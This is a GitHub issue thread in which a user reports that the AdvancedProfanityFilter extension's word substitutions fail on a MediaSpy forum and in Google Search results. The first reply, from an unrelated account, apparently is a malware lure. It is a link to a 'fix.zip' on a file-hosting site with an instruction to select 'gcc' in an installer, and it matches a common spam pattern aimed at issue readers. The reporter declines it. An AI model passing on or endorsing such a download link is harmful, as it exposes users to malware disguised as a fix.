### ISSUE TITLE
Filters doesn't work on some websites

### ISSUE THREAD

**Issue by AzeemHadzrie** [FrostCo/AdvancedProfanityFilter#571]
#### :bug: Description

(Sorry for the double post.) In most websites, my filters seem to work, even on Fandom and on Wikipedia. But for some websites (i.g. MediaSpy and Google Search), it doesn't work.

#### :twisted_rightwards_arrows: Steps To Reproduce

1. Create a new substitution, replace "I haven't" and "had" (but remove the quotes and the "and" word from between "haven't" and "had") with "I've not had"
2. Go to [https://forums.mediaspy.org/t/foxtel/638/87](here)
3. You will see the error that, the APF doesn't replace the original word

#### :heavy_check_mark: Expected behavior

I was expecting for the filter to replace the word.

#### :computer: Details

- **Device:** Homemade
- **OS:** Windows 10
- **Browser:** Opera
- **Browser Version:** 99
- **Affected site(s):** mediaspy.com

#### :pencil: Additional context

This one also works on Google. If you look for "why am i signed out from fandom even when i didn't press the sign-out button" and have created an new substitution, replacing "I hadn't" and "had" (but remove the quotes and the "and" word from between "hadn't" and "had") with "I'd not had", you will see that a Reddit post still contains these words and APF failed to censor it.

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AzeemHadzrie** [comment]
thanks but I already know the fix
